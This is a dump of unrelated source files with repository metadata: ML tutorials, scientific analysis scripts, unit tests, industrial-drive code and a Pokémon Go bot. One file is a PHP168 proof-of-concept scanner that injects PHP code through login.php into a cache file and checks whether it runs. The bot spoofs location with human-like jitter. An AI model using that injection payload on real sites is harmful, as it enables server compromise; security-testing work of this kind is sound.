'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['flatpages_plus']
|
[
"oleg.dolya@gmail.com"
] |
oleg.dolya@gmail.com
|
af5d7b1d518ffbf1091fa797c5bab04d0ceafc39
|
5b5eb61c02a1ee6632036a31108d5c962d474d2e
|
/00/pytorch.py
|
bae78442e40b561cf168d0df6d691ad703c08406
|
[] |
no_license
|
seven320/deeplearning
|
73c76fa5e006a9164ed11fe9538b4975c0bdc161
|
56300e450caf390b4f953a9c882a9b4701ccb971
|
refs/heads/master
| 2021-04-26T22:27:47.019462
| 2018-11-06T02:09:04
| 2018-11-06T02:09:04
| 124,096,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,648
|
py
|
# coding: utf-8
# pytorch とは?
# https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html#sphx-glr-beginner-blitz-tensor-tutorial-py
# In[ ]:
from __future__ import print_function
import torch
x = torch.empty(5, 3)
print(x)
# ランダム初期設定行列(randomly initialized matrix)
# In[7]:
x = torch.rand(5,3)
print(x)
# In[ ]:
0初期設定の行列
# In[8]:
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# 実際の値からの行列
# In[9]:
x = torch.tensor([5.5, 3])
print(x)
# In[11]:
x = x.new_ones(5, 3, dtype=torch.double)
print(x)
x = torch.randn_like(x, dtype=torch.float)
print(x)
# In[14]:
print(x.size())
# In[25]:
# x = x.new_ones(5, 3, dtype=torch.double)
x = torch.randn_like(x, dtype=torch.float)
y = torch.rand(5,3)
print(x + y)
# print(x + y)
# In[26]:
print(torch.add(x, y))
# In[29]:
result = torch.empty(5,3)
torch.add(x, y, out=result)
print(result)
# In[30]:
y.add_(x)
print(y)
# In[32]:
print(x)
print(x[:, 1])
# In[36]:
x = torch.randn(4,4)
y = x.view(8,2)
z = x.view(-1, 8)
print(x.size(),y.size(),z.size())
# In[38]:
x = torch.randn(1)
print(x)
print(x.item())
# In[40]:
a = torch.ones(5)
print(a)
# In[47]:
import numpy as np
b = a.numpy()
print(b)
c = np.copy(a.numpy())
print(c)
# In[42]:
a.add_(1)
print(a)
print(b)
# In[49]:
a = np.ones(5)
b = torch.from_numpy(a)
print(a,b)
np.add(a, 1, out=a)
print(a,b)
# In[50]:
if torch.cuda.is_available():
device = torch.device("cuda")
y = torch.ones_like(x, device=device)
x = x.to(device)
z = x + y
print(z)
print(z.to("cpu", torch.double))
|
[
"yosyuaomenw@yahoo.co.jp"
] |
yosyuaomenw@yahoo.co.jp
|
4a70189f56b7c999e46df08262eb3ac37e231c87
|
77871bb4c5f4714a19c33ad804a20c94bcdacc7e
|
/Interfaces/AI/Stepper/Pokestopper.py
|
abd44d28f5e7de1647e7ca9a35e479c9fd8da45b
|
[] |
no_license
|
MaxOnNet/PokeStats
|
58165f449acf3fc5b14e4f3a63a783f947df3eb8
|
3eb5aa2d13833b1d2299023f4d6f88348bae3bd6
|
refs/heads/master
| 2021-01-20T20:28:56.999545
| 2016-08-24T08:06:41
| 2016-08-24T08:06:41
| 63,936,162
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,961
|
py
|
# -*- coding: utf-8 -*-
import logging
import random
from math import ceil
from sqlalchemy import text as sql_text
from Interfaces.MySQL.Schema import Pokestop, parse_map_cell
from Interfaces.AI.Human import sleep, random_lat_long_delta, action_delay
from Interfaces.AI.Stepper.Normal import Normal
from Interfaces.AI.Worker.Utils import format_time, distance
from Interfaces.pgoapi.utilities import f2i, h2f, get_cell_ids
log = logging.getLogger(__name__)
class Pokestopper(Normal):
def inicialise(self):
log.info('Точечное сканирование P\S, переопределяем переменные БД')
self.scanner.mode.step = 0.0015
self.scanner.mode.walk = 6
self.scanner.mode.is_catch = False
self.scanner.mode.is_farm = True
self.scanner.mode.is_lookup = False
self.scanner.mode.is_defender = False
def take_step(self):
position = [self.origin_lat, self.origin_lon, 0]
coords = self.generate_coords(self.origin_lat, self.origin_lon, self.step, self.distance)
self.metrica.take_position(position, self.geolocation.get_google_polilyne(coords))
self.api.set_position(*position)
step = 1
for coord in coords:
self.metrica.take_status(scanner_msg='Point P\S ({} / {})'.format(step, len(coords)))
log.info('Точечное сканирование P\S ({} / {})'.format(step, len(coords)))
position = (coord['lat'], coord['lng'], 0)
if self.walk > 0:
self._walk_to(self.walk, *position)
else:
self.api.set_position(*position)
self.ai.heartbeat()
self._work_at_position(position[0], position[1], position[2], seen_pokemon=False, seen_pokestop=True, seen_gym=False, data=coord['id'])
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
step += 1
def _walk_to(self, speed, lat, lng, alt):
dist = distance(self.api._position_lat, self.api._position_lng, lat, lng)
steps = (dist + 0.0) / (speed + 0.0) # may be rational number
intSteps = int(steps)
residuum = steps - intSteps
log.info('Бежим из ' + str((self.api._position_lat, self.api._position_lng)) + " в " + str(str((lat, lng))) +
" на " + str(round(dist, 2)) + " по прямой. " + str(format_time(ceil(steps))))
if steps != 0:
dLat = (lat - self.api._position_lat) / steps
dLng = (lng - self.api._position_lng) / steps
for i in range(intSteps):
cLat = self.api._position_lat + dLat + random_lat_long_delta()
cLng = self.api._position_lng + dLng + random_lat_long_delta()
self.api.set_position(cLat, cLng, alt)
self.ai.heartbeat()
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
self.api.set_position(lat, lng, alt)
self.ai.heartbeat()
def _work_at_position(self, lat, lng, alt, seen_pokemon=False, seen_pokestop=False, seen_gym=False, data=None):
if data is not None:
pokestop = self.session.query(Pokestop).get(data)
cell = {
'forts': [
{
'id': pokestop.id,
'type': 1,
'latitude': pokestop.latitude,
'longitude': pokestop.longitude
}
]
}
self.metrica.take_search({'pokestops': 1})
self.api.set_position(lat, lng, alt)
self.ai.work_on_cell(cell, (lat, lng, alt), seen_pokemon=False, seen_pokestop=True, seen_gym=False)
position = (lat, lng, alt)
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
map_cells = list()
sleep(self.ai.delay_scan)
response_dict = self.api.get_map_objects(latitude=f2i(lat), longitude=f2i(lng), since_timestamp_ms=timestamp, cell_id=cellid)
self.search.search(lat, lng)
if response_dict and 'status_code' in response_dict:
if response_dict['status_code'] is 1:
if 'responses' in response_dict:
if 'GET_MAP_OBJECTS' in response_dict['responses']:
if 'status' in response_dict['responses']['GET_MAP_OBJECTS']:
if response_dict['responses']['GET_MAP_OBJECTS']['status'] is 1:
map_cells = response_dict['responses']['GET_MAP_OBJECTS']['map_cells']
# Update current scanner location
self.metrica.take_position(position)
map_cells.sort(key=lambda x: distance(lat, lng, x['forts'][0]['latitude'], x['forts'][0]['longitude']) if 'forts' in x and x['forts'] != [] else 1e6)
log.debug("Получена информация о карте в размере {0} ячеек".format(len(map_cells)))
for cell in map_cells:
self.metrica.take_search(parse_map_cell(cell, self.session))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['responses']['GET_MAP_OBJECTS']['status']))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['status_code']))
self.api.set_position(lat, lng, alt)
for cell in map_cells:
self.ai.work_on_cell(cell, position, seen_pokemon=seen_pokemon, seen_pokestop=seen_pokestop, seen_gym=seen_gym)
def generate_coords(self, latitude, longitude, step_size, distance):
sql = """
SELECT
id as "pokestop_id",
latitude as "pokestop_latitude",
longitude as "pokestop_longitude",
(
6371 * acos (
cos ( radians({0}) )
* cos( radians( latitude ) )
* cos( radians( longitude ) - radians({1}) )
+ sin ( radians({2}) )
* sin( radians( latitude ) )
) * 1000
) AS "pokestop_distance"
FROM pokestop
HAVING pokestop_distance < {3}
ORDER BY pokestop_distance
""".format(latitude, longitude, latitude, distance)
coords = []
for pokestop in self.session.execute(sql_text(sql)):
lat = pokestop[1] + random_lat_long_delta()
lng = pokestop[2] + random_lat_long_delta()
coords.append({'lat': lat, 'lng': lng, 'id': pokestop[0]})
return coords
|
[
"viktor@tatarnikov.org"
] |
viktor@tatarnikov.org
|
72d83f61ea7278de06a9f45c110a3ffba2430063
|
163808746e51d378f69a966645b8bb8a855b4625
|
/MyMain1012/MyMain1012/mislHrf.py
|
860d28ba23c0e7b4b51f525d9b16734181920a56
|
[] |
no_license
|
0024thiroshi/comm5.0_fall_semester
|
02b26b506b759dd7b18b963295a8908cb4a78245
|
db350599b7085e56fbf2c316e74cd7a5b48f02b8
|
refs/heads/main
| 2023-02-12T13:07:34.080809
| 2021-01-13T06:03:04
| 2021-01-13T06:03:04
| 329,202,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import scipy
import numpy as np
from math import exp
import pandas as pd
import scipy.stats as sps
import matplotlib.pyplot as plt
import math
def hrf(nt,
peak_delay=6,
under_delay=10,
p_u_ratio = 6,):#nt:時間間隔
t = np.arange(0,30+nt,nt)
peak_disp=1
under_disp=1
normalize=True
hrf = np.zeros(t.shape, dtype=np.float)
pos_t = t[t > 0]
peak = sps.gamma.pdf(pos_t,
peak_delay/peak_disp,
loc=0,
scale=peak_disp)
UD = under_delay + peak_delay
undershoot = sps.gamma.pdf(pos_t,
UD / under_disp,
loc=0,
scale=under_disp)
hrf = peak - undershoot / p_u_ratio
if not normalize:
return hrf
return hrf / np.max(hrf)
|
[
"“0024thiroshi@gmail.com”"
] |
“0024thiroshi@gmail.com”
|
e7e44f6c501f1455b389ef57e85fc9f635efc6a2
|
b0ddd37a614556785b2ecd3d408357fd010ed72f
|
/test/test_py2vega.py
|
61017752de6e06bfb281d05b43ba4bed2c5c5854
|
[
"BSD-3-Clause"
] |
permissive
|
codeaudit/py2vega
|
837c9b347f4968956656fcfbc15b2d69110e267f
|
a3a94bf7e29414a649b796e3202a5621befadbb3
|
refs/heads/master
| 2020-07-07T13:06:04.690110
| 2019-08-20T08:49:12
| 2019-08-20T08:49:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,294
|
py
|
import pytest
from py2vega import py2vega
from py2vega.functions.math import isNaN
whitelist = ['value', 'x', 'y', 'height', 'width', 'row', 'column']
def test_nameconstant():
code = 'False'
assert py2vega(code, whitelist) == 'false'
code = 'True'
assert py2vega(code, whitelist) == 'true'
code = 'None'
assert py2vega(code, whitelist) == 'null'
def test_num():
code = '36'
assert py2vega(code, whitelist) == '36'
def test_str():
code = '\'white\''
assert py2vega(code, whitelist) == '\'white\''
def test_tuple():
code = '(True, 3, \'hello\')'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
code = '((True, 3, \'hello\'), 3)'
assert py2vega(code, whitelist) == '[[true, 3, \'hello\'], 3]'
def test_list():
code = '[True, 3, \'hello\']'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
def test_dict():
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
def test_unary():
code = 'not value'
assert py2vega(code, whitelist) == '!(value)'
code = '-value'
assert py2vega(code, whitelist) == '-value'
code = '+value'
assert py2vega(code, whitelist) == '+value'
def test_binary():
code = 'value or 3'
assert py2vega(code, whitelist) == 'value || 3'
code = 'value and 3'
assert py2vega(code, whitelist) == 'value && 3'
code = 'value + 3'
assert py2vega(code, whitelist) == 'value + 3'
code = 'value**3'
assert py2vega(code, whitelist) == 'pow(value, 3)'
def test_ternary():
code = '3 if value else 4'
assert py2vega(code, whitelist) == 'value ? 3 : 4'
def test_compare():
code = '3 < value <= 4'
assert py2vega(code, whitelist) == '3 < value <= 4'
code = 'value in (\'ford\', \'chevrolet\')'
assert py2vega(code, whitelist) == 'indexof([\'ford\', \'chevrolet\'], value) != -1'
code = '\'chevrolet\' in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') != -1'
code = '\'chevrolet\' not in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') == -1'
def foo(value):
return 'red' if value < 150 else 'green'
def test_function():
assert py2vega(foo, whitelist) == 'value < 150 ? \'red\' : \'green\''
def test_whitelist():
with pytest.raises(NameError):
py2vega('my_variable')
assert py2vega('my_variable', ['my_variable']) == 'my_variable'
# Vega constants are accessible by default
assert py2vega('PI') == 'PI'
def bar():
return isNaN(3)
def test_math():
assert py2vega(bar) == 'isNaN(3)'
def invalid_func1():
print(3)
def test_invalid1():
with pytest.raises(RuntimeError):
py2vega(invalid_func1)
def test_invalid2():
with pytest.raises(RuntimeError):
py2vega(lambda value: value)
def conditional_func(value):
if value < 3:
return 'red'
elif value < 5:
return 'green'
else:
return 'yellow'
def test_if_stmt():
assert py2vega(conditional_func, whitelist) == "if(value < 3, 'red', if(value < 5, 'green', 'yellow'))"
def assign_func1(value):
val = ('USA', 'Japan')
return 'red' if value in val else 'green'
def assign_func2(value):
a = 'green'
b = 'red'
return a if value < 3 else b
def assign_func3(value):
a = 'green'
a = 'red'
return a
def assign_func4(value):
a = 'green'
b = a
return b
def assign_func5(value):
a = b = 'Hello'
return (a, b)
def assign_func6(value):
a = 'Hello'
b = a
a = 'World'
return b
def test_assign1():
assert py2vega(assign_func1, whitelist) == "indexof(['USA', 'Japan'], value) != -1 ? 'red' : 'green'"
def test_assign2():
assert py2vega(assign_func2, whitelist) == "value < 3 ? 'green' : 'red'"
def test_assign3():
assert py2vega(assign_func3, whitelist) == "'red'"
def test_assign4():
assert py2vega(assign_func4, whitelist) == "'green'"
def test_assign5():
assert py2vega(assign_func5, whitelist) == "['Hello', 'Hello']"
def test_assign6():
assert py2vega(assign_func6, whitelist) == "'Hello'"
|
[
"martin.renou@gmail.com"
] |
martin.renou@gmail.com
|
d771baddfaa09a4c3db22756b3f490f38382cbf3
|
afada51a34ebc932fc9ca824ecf56aae04e3d74b
|
/lib/enrichment_modules.py
|
b74c4fce6db72594a14b0b79acb4fe6ac996284c
|
[] |
no_license
|
SkBlaz/CBSSD
|
0ec8c7e3fc2765d4897b650f584e97afabf7c4f6
|
3043a76c7065fa0f13770f38d3b7b3f661a9f117
|
refs/heads/master
| 2021-01-01T19:53:21.190536
| 2019-02-01T06:31:23
| 2019-02-01T06:31:23
| 98,710,089
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,931
|
py
|
##### this pyton code enables enrichment calculation from graph results from previous step
## this is to calculate enrichment scores
from scipy.stats import fisher_exact
import multiprocessing as mp
import random
from statsmodels.sandbox.stats.multicomp import multipletests
from collections import defaultdict, Counter
from .parsers import parse_gaf_file,read_termlist,read_topology_mappings,read_uniprot_GO
import pandas as pd
def calculate_pval(term):
# _partition_name,_partition_entries,term,_map_term_database,_number_of_all_annotated
## this calculates p value
#print(component, term_dataset, term, count_all)
query_term = term[0]
query_term_count_population = term[1]
inside_local = 0
outside_local = 0
for x in _partition_entries:
terms = _map_term_database[x]
if query_term in terms:
inside_local+=1
else:
outside_local+=1
query_counts = [inside_local, query_term_count_population]
pop_counts = [outside_local, _number_of_all_annotated-query_term_count_population]
p_value = fisher_exact([query_counts,pop_counts])[1]
return p_value
def multiple_test_correction(input_dataset):
from statsmodels.sandbox.stats.multicomp import multipletests
pvals = defaultdict(list)
with open(input_dataset) as ods:
for line in ods:
try:
component, term, pval = line.split()
pvals[component].append((term,pval))
except:
pass
print ("Component_by_size PFAM_term pvalue")
for key, values in pvals.items():
tmpP = [float(val[1]) for val in values]
termN = [val[0] for val in values]
significant, pvals, sidak, bonf = multipletests(tmpP,method="hs",is_sorted=False,returnsorted=False)
## Holm Sidak
output = zip(termN,significant,pvals,tmpP)
for term,significant,pval,tmp in output:
if (significant == True):
print (key,term,significant,tmp,pval)
def parallel_enrichment(term):
pval = calculate_pval(_term_database[term])
return {'observation' : _partition_name,'term' : _term_database[term][0],'pval' : pval}
def compute_enrichment(term_dataset, term_database, topology_map, all_counts, whole_term_list=False):
if whole_term_list:
tvals = set.union(*[x for x in topology_map.values()])
topology_map = {}
topology_map['1_community'] = tvals
global _partition_name
global _partition_entries
global _term_database
global _map_term_database
global _number_of_all_annotated
_number_of_all_annotated = all_counts
_term_database = {en : x for en, x in enumerate(term_database.items())} ## database of all annotations
_map_term_database = term_dataset ## entry to acc mappings
finalFrame = pd.DataFrame()
for k, v in topology_map.items():
print("Computing enrichment for partition {}".format(k))
## reassign for parallel usage
_partition_name = k
_partition_entries = v
## computational pool instantiation
ncpu = 2 #mp.cpu_count()
pool = mp.Pool(ncpu)
## compute the results
n = len(term_database)
step = ncpu ## number of parallel processes
jobs = [range(n)[i:i + step] for i in range(0, n, step)] ## generate jobs
## result container
tmpframe = pd.DataFrame(columns=['observation','term','pval'])
results = [parallel_enrichment(x) for x in range(n)]
# for batch in jobs:
# results = pool.map(parallel_enrichment,batch)
tmpframe = tmpframe.append(results,ignore_index=True)
## multitest corrections on partition level
significant, p_adjusted, sidak, bonf = multipletests(tmpframe['pval'],method="fdr_bh",is_sorted=False, returnsorted=False, alpha=0.05)
tmpframe['corrected_pval_fdr_bh'] = pd.Series(p_adjusted)
tmpframe['significant'] = pd.Series(significant)
tmpframe = tmpframe[tmpframe['significant'] == True]
finalFrame = finalFrame.append(tmpframe,ignore_index=True)
return finalFrame
if __name__ == "__main__":
print("Starting enrichment analysis..")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename",default="./test.txt")
parser.add_argument("--filename_mappings",default="./test.txt")
args = parser.parse_args()
## 1.) read the database.
term_dataset, term_database, all_counts = read_uniprot_GO(args.filename)
## 2.) partition function dict.
topology_map = read_topology_mappings(args.filename_mappings)
## 3.) calculate p-vals.
significant_results = compute_enrichment(term_dataset, term_database, topology_map, all_counts,whole_term_list=False)
significant_results.to_csv("../example_outputs/term_examples.txt",sep=" ",header=False)
|
[
"skrljblaz@gmail.com"
] |
skrljblaz@gmail.com
|
3e01df71c43a92672a6b4387ffcd0d505ed0ef01
|
6c219c027c7d0ef454bdeac196bd773e8b95d602
|
/cms/php168/php168_login_getshell.py
|
08224eb0012c6eed6e10a98c7606dfd32c336bc4
|
[] |
no_license
|
aStrowxyu/pocscan
|
663f3a3458140e1bce7b4dc3702c6014a4c9ac92
|
08c7e7454c6b7c601bc54c21172c4788312603b1
|
refs/heads/master
| 2020-04-19T10:00:56.569105
| 2019-01-29T09:31:31
| 2019-01-29T09:31:31
| 168,127,418
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,581
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: PHP168 login.php GETSHELL漏洞
referer: http://wooyun.org/bugs/wooyun-2014-050515
author: Lucifer
description: Powered by php168 v6或者一下版本v5、v4、v3、v2、v1会搜索到很多很多相关的网站,login.php文件可以把代码写入cache目录中。
'''
import sys
import requests
import warnings
from termcolor import cprint
class php168_login_getshell_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/login.php?makehtml=1&chdb[htmlname]=404.php&chdb[path]=cache&content=<?php%20echo%20md5(1234);?>"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
verifyurl = self.url + "/cache/404.php"
req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在PHP168 GETSHELL漏洞...(高危)\tpayload: "+verifyurl, "red")
else:
cprint("[-]不存在php168_login_getshell漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = php168_login_getshell_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"wangxinyu@vackbot.com"
] |
wangxinyu@vackbot.com
|
86024511a554590ea7ae122070eab0f619c43d93
|
4fd5860beb1e6809eee297509bcc776dfca40aca
|
/event_synchronization_analysis/ed_lf_es_mc.py
|
cab4b7d9f4e05674b37592ab836218dde4a38ed7
|
[] |
no_license
|
manmeet3591/fingerprint-volcano-enso-im
|
40a41eca517abdd09079feb7ae58cc866343d6a8
|
21f39125ece4d03c5ee2961e4aae3768ee61cdb8
|
refs/heads/master
| 2021-07-05T09:49:28.858614
| 2021-04-19T02:55:45
| 2021-04-19T02:55:45
| 229,057,834
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,004
|
py
|
# coding: utf-8
# In[1]:
from __future__ import print_function, division
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import datetime as dt
import warnings
import random
warnings.filterwarnings("ignore")
sns.set()
# In[2]:
nino3 = np.genfromtxt ('tas_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_1_nino3_tseries.csv', delimiter=",")
ismr = np.genfromtxt ('pr_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_india_goswami_2002_tseries.csv', delimiter=",")
vrf = np.genfromtxt ('sigl.txt', delimiter=",")
print(nino3.shape)
print(ismr.shape)
print(vrf.shape)
# In[3]:
def common_time_axis(dismr, verbose=True):
"""
Generates common time axis for Nino3 and ISMR time series.
"""
# generate the time axis
Nt = len(dismr)
time = [dt.datetime(850, 1, 15)]
for i in range(1, len(dismr)):
y = time[i - 1].year
m = time[i - 1].month
if m == 12:
y += 1
m = 0
time.append(dt.datetime(y, m + 1, 15))
time = np.array(time)
return time
def yearly_time_axis(dvolc, verbose=True):
"""
Generates time axis for yearly data
"""
Nt = len(dvolc)
time = [dt.datetime(900, 1, 15)]
for i in range(1, len(dvolc)):
y = time[i - 1].year
y += 1
time.append(dt.datetime(y, 1, 15))
time = np.array(time)
return time
def moving_average_anomaly(dismr,n=360):
"""
Generates moving average anomaly of long time series
"""
#print(dismr.shape)
dismr_anom = np.zeros((dismr.shape[0]))
dismr_std = np.zeros((dismr.shape[0]))
dismr_anom[0:n/2] = ( dismr[0:n/2] - np.mean(dismr[0:n]) )/np.std(dismr[0:n])
dismr_anom[dismr.shape[0]-n/2:] = ( dismr[dismr.shape[0]-n/2:] - np.mean(dismr[dismr.shape[0]-n:]) )/np.std(dismr[dismr.shape[0]-n:])
#print(dismr_anom)
dismr_std[0:n/2] = np.std(dismr[0:n])
dismr_std[dismr.shape[0]-n/2:] = np.std(dismr[dismr.shape[0]-n:])
for i in range(np.int(n/2),np.int(dismr.shape[0]-n/2)):
dismr_anom[i] = (dismr[i] - np.mean(dismr[i-n/2:i+n/2]))/np.std(dismr[i-n/2:i+n/2])
dismr_std[i] = np.std(dismr[i-n/2:i+n/2])
return dismr_anom, dismr_std
def EventSync(es1, es2, taumax):
"""
Compute non-vectorized event synchronization
:type es1: 1D Numpy array
:arg es1: Event series containing '0's and '1's
:type es2: 1D Numpy array
:arg es2: Event series containing '0's and '1's
:float return: Event synchronization es2 to es1
"""
ex = np.arange(len(es1))[es1 == 1]
ey = np.arange(len(es2))[es2 == 1]
lx = len(ex)
ly = len(ey)
count = 0
if lx!=0 and ly!=0:
for m in range(1, lx-1):
for n in range(1, ly-1):
dst = ex[m] - ey[n]
if abs(dst) > taumax:
continue
elif dst == 0:
count += 0.5
continue
# finding the dynamical delay tau
tmp = ex[m+1] - ex[m]
if tmp > ex[m] - ex[m-1]:
tmp = ex[m] - ex[m-1]
tau = ey[n+1] - ey[n]
if tau > ey[n] - ey[n-1]:
tau = ey[n] - ey[n-1]
if tau > tmp:
tau = tmp
tau = tau / 2
if dst > 0 and dst <= tau:
count += 1
#print("count = ",count)
#print("Q = ",np.sqrt((lx-2) * (ly-2)))
#print("lx,ly,Q =",lx,ly,count)
if lx!=0 and ly!=0:
return count / np.sqrt((lx) * (ly))
#return count / np.sqrt((lx-2) * (ly-2))
else:
return 0.0
def my_shuffle(array):
random.shuffle(array)
return array
# In[12]:
ismr_anom, ismr_std = moving_average_anomaly(ismr)
nino3_anom, nino3_std = moving_average_anomaly(nino3)
es_ismr_d = np.zeros((ismr_anom.shape[0]))
es_ismr_f = np.zeros((ismr_anom.shape[0]))
es_nino3_en = np.zeros((nino3_anom.shape[0]))
es_nino3_ln = np.zeros((nino3_anom.shape[0]))
es_ismr_f[ismr_anom>1.0] = 1.0
es_ismr_d[ismr_anom<-1.0] = 1.0
es_nino3_en[nino3_anom>0.5] = 1.0
es_nino3_ln[nino3_anom<-0.5] = 1.0
taumax = 24
# In[13]:
Q_hist_ed = np.zeros((es_ismr_d.shape[0]-taumax))
Q_hist_lf = np.zeros((es_ismr_d.shape[0]-taumax))
es_ismr_d_mc = my_shuffle(es_ismr_d)
es_ismr_f_mc = my_shuffle(es_ismr_f)
for i in range(es_ismr_d.shape[0]-taumax):
Q_hist_12 = EventSync(es_ismr_d[i:i+taumax], es_nino3_en[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_en[i:i+taumax], es_ismr_d[i:i+taumax],taumax)
Q_hist_ed[i] = Q_hist_12 + Q_hist_21
Q_hist_12 = EventSync(es_ismr_f[i:i+taumax], es_nino3_ln[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_ln[i:i+taumax], es_ismr_f[i:i+taumax],taumax)
Q_hist_lf[i] = Q_hist_12 + Q_hist_21
# In[15]:
np.savetxt("Q_hist_ed.csv", Q_hist_ed, delimiter=",")
np.savetxt("Q_hist_lf.csv", Q_hist_lf, delimiter=",")
# In[27]:
|
[
"manmeet20singh11@gmail.com"
] |
manmeet20singh11@gmail.com
|
03a9dfea771fb783bbd10950701d0049f6fa4eb3
|
b76e39e535499704368eddc26237dc0016ef7d06
|
/RailRites/allsiemensdriveprocessing.py
|
a9963fed91147d1a03a027d0f56cd7e4d6f3f9fa
|
[] |
no_license
|
BUBAIMITRA2018/castersimulation
|
0532e53df7d346c2824e577cc91cd0ac2ce4694c
|
eca5fddff5c0f33f785168f6b1e9f572c1622be0
|
refs/heads/master
| 2022-12-10T02:45:04.207196
| 2020-09-09T05:35:54
| 2020-09-09T05:35:54
| 260,110,682
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,309
|
py
|
from observable import *
import logging
from clientcomm_v1 import *
from readgeneral_v2 import *
logger = logging.getLogger("main.log")
threadlist = []
class AreaObserver:
def __init__(self, observable):
observable.register_observer(self)
def notify(self, *args, **kwargs):
for item in args[0]:
try:
# threading = multiprocessing.Process(target=self.callmotor2dprocess,args=(item))
thread = threading.Thread(target=self.callsiemendsdriveprocess, args=[item])
threadlist.append(thread)
except Exception as e:
level = logging.INFO
messege = "NOTIFY" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def callsiemendsdriveprocess(self, item):
while True:
try:
item.driveprocess
except Exception as e:
level = logging.INFO
messege = "calldriveprocess" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def __init__(self, alldevices, filename):
self.subject = Observable()
self.alldevices = alldevices
self.client = Communication()
self.sta_con_plc = self.client.opc_client_connect(filename)
self.observer = AreaObserver(self.subject)
self.readgeneral = ReadGeneral(self.sta_con_plc)
def process(self, filename):
try:
for area, devices in readkeyandvalues(self.alldevices):
areavalue = self.readgeneral.readsymbolvalue(area, 'S7WLBit', 'PA')
if areavalue == 1:
self.observer.notify(devices, filename)
for j in threadlist:
j.start()
except Exception as e:
level = logging.INFO
messege = "PROCCESS" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def readkeyandvalues(alldevice):
siemensdrivedictionary = alldevice.allsiemensdrives.dictionary
areas = list(siemensdrivedictionary.keys())
n = 0
while n < len(areas):
area = areas[n]
devices = siemensdrivedictionary[area]
yield area,devices
n = n + 1
|
[
"subrata.mitra@sms-group.com"
] |
subrata.mitra@sms-group.com
|
ee0bc5029cbb3d92a0311e726a37acbb4ac87617
|
6601acd5ba7aaaa11f8620df9509e951574373b4
|
/aircraft_comparisons/make_1D_histograms.py
|
bbdbf982f6c812b8a0ea1ad7599d3578d647ec37
|
[] |
no_license
|
rachawker/Hawker_ACP_2021-UM_CASIM_paper
|
852d07519e4c15791e38bdf8ba7ae4ee9ac3707c
|
ff3cdd0b1ff72b0fed477824679ab7da49976aa3
|
refs/heads/main
| 2023-04-07T20:23:16.738292
| 2021-04-22T13:07:22
| 2021-04-22T13:14:40
| 360,516,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,512
|
py
|
from __future__ import division
import matplotlib.gridspec as gridspec
import iris
#import iris.coord_categorisation
import iris.quickplot as qplt
import cartopy
import cartopy.feature as cfeat
import rachel_dict as ra
#import iris # library for atmos data
import cartopy.crs as ccrs
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import matplotlib.colors as cols
import matplotlib.cm as cmx
import matplotlib._cntr as cntr
from matplotlib.colors import BoundaryNorm
import netCDF4
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import os,sys
#scriptpath = "/nfs/a201/eereh/scripts/2D_maps_of_column_max_reflectivity/"
#sys.path.append(os.path.abspath(scriptpath))
import colormaps as cmaps
from matplotlib.patches import Polygon
from mpl_toolkits.basemap import Basemap
import sys
import UKCA_lib as ukl
import glob
import netCDF4 as nc
import scipy.ndimage
import rachel_lists as rl
air_up = ra.read_in_nc_variables(rl.air_updraft_file, rl.air_updraft_var)
air_TWC = ra.read_in_nc_variables(rl.air_TWC_file, rl.air_TWC_var)
air_CDNC = ra.read_in_nc_variables(rl.air_CDNC_file, rl.air_CDNC_var)
